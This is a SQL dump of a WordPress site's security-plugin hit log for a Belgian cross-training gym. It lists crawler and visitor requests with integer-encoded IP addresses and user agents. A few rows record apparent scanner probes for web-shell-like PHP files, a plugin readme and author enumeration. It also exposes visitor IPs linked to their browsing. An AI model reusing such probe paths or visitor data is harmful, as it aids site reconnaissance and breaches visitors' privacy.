(69211, 1491861174.828558, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69212, 1491861402.284843, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/assets/images/version.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69213, 1491878437.411432, 1570674729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69214, 1491878443.378667, 1123631646, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69215, 1491878443.385409, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69216, 1491878443.924206, 1123631646, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69217, 1491886384.030226, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69218, 1491886384.451078, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69219, 1491886392.229563, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69220, 1491887702.367039, 872366420, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69221, 1491887735.970771, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69222, 1491887920.861438, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69223, 1491888232.013776, 1123631816, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69224, 1491888233.200231, 1123631639, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69225, 1491889550.967256, 100662546, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69226, 1491895348.135833, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69227, 1491895348.404144, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69228, 1491900185.914739, 2637637422, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69229, 1491903189.107511, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69230, 1491905670.042732, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69231, 1491909664.960739, 3475901709, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69232, 1491911994.340528, 1538729458, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwi3mLGJrZzTAhVHthoKHX5nCQYQFghrMAg&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(69233, 1491911997.974365, 1538729458, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(69234, 1491912113.130754, 2521214253, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(69235, 1491912113.538207, 2521214217, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(69236, 1491913141.947648, 2521214219, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(69237, 1491916360.830475, 1123631693, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69238, 1491918000.944307, 3281698622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69239, 1491921497.656277, 3512711143, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(69240, 1491931719.345696, 878096387, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ia_archiver'),
(69241, 1491931720.288284, 878096387, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'ia_archiver'),
(69242, 1491933820.507663, 1538438226, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69243, 1491935069.364187, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69244, 1491935072.875878, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69245, 1491936848.265471, 3475901949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69246, 1491941150.652880, 3103997920, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2700.13 Safari/537.36'),
(69247, 1491943528.159778, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69248, 1491944929.692853, 2366145547, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69249, 1491948523.972556, 3475901949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69250, 1491948524.189954, 3475901949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69251, 1491973972.493679, 1837912589, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G800F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69252, 1491973975.432001, 1837912589, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G800F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69253, 1491988747.118602, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjepKaYy57TAhXFSRoKHWuHDL0QFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69254, 1491988750.200487, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69255, 1491988750.551198, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69256, 1491988756.166071, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69257, 1491992879.079744, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(69258, 1491992880.469549, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(69259, 1491992910.910024, 2499535434, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(69260, 1491994896.267723, 1605828420, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69261, 1491994898.862664, 1605828420, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69262, 1491997082.818417, 2783005756, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(69263, 1491997087.732582, 2783005756, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(69264, 1492000863.816979, 3287437327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/?author=1', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7'),
(69265, 1492002658.242043, 872366345, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69266, 1492012366.034463, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69267, 1492017323.391689, 1538608488, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69268, 1492017389.536200, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69269, 1492017391.934606, 1538608488, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69270, 1492017411.815904, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69271, 1492017540.697483, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69272, 1492017546.316422, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69273, 1492017565.958519, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69274, 1492017587.150111, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69275, 1492017597.572663, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69276, 1492035126.373718, 3475901914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69277, 1492036067.801137, 3024883488, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69278, 1492039086.735743, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69279, 1492052530.405802, 2996485381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69280, 1492052531.510512, 2366158866, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69281, 1492054102.080892, 2996485408, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69282, 1492054662.460512, 3103997920, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/readme.txt', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2842.35 Safari/537.36'),
(69283, 1492057920.905369, 3024883490, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69284, 1492058761.368905, 16886417, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69285, 1492058767.429728, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69286, 1492061916.917864, 1123635120, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69287, 1492061917.474618, 1123635120, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69288, 1492064645.508590, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69289, 1492065389.515769, 3652617281, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69290, 1492065395.848269, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69291, 1492066474.669148, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69292, 1492066475.307445, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69293, 1492066630.243236, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69294, 1492066842.083443, 856623645, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/up.php', 'http://www.crosstrainingcenter.be/up.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(69295, 1492066958.756315, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69296, 1492068251.716195, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiPmoGv86DTAhVFIcAKHdT7BxQQFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69297, 1492068255.442781, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69298, 1492068255.848553, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69299, 1492070407.855833, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(69300, 1492072397.043373, 3475901902, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69301, 1492072405.410314, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69302, 1492075309.683218, 3567655745, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69303, 1492075310.864453, 3567655745, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69304, 1492075314.780113, 3567655745, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69305, 1492075612.012004, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69306, 1492076231.451671, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69307, 1492078559.213517, 878096387, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ia_archiver'),
(69308, 1492078560.190563, 878096387, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'ia_archiver'),
(69309, 1492081708.768621, 1123635016, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69310, 1492081710.001426, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69311, 1492086870.358766, 1838116183, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(69312, 1492086873.267781, 1838116183, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(69313, 1492086925.350797, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69314, 1492091269.139388, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69315, 1492091272.299109, 2996485408, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69316, 1492101450.160980, 90615111, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MojeekBot/0.6; +https://www.mojeek.com/bot.html)'),
(69317, 1492103966.014631, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69318, 1492103970.317560, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69319, 1492108227.353175, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69320, 1492108656.234407, 3024883467, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69321, 1492109320.900318, 2733854909, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)/Nutch-1.13'),
(69322, 1492112119.527861, 2733848028, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36/Nutch-1.13'),
(69323, 1492115828.606216, 1375113915, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwjB-f_LpKLTAhWTOsAKHco9DgEQFggrMAE&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&bvm=bv.152180690,d.bGs', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MAPBJS; rv:11.0) like Gecko'),
(69324, 1492115833.637703, 1375113915, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MAPBJS; rv:11.0) like Gecko'),
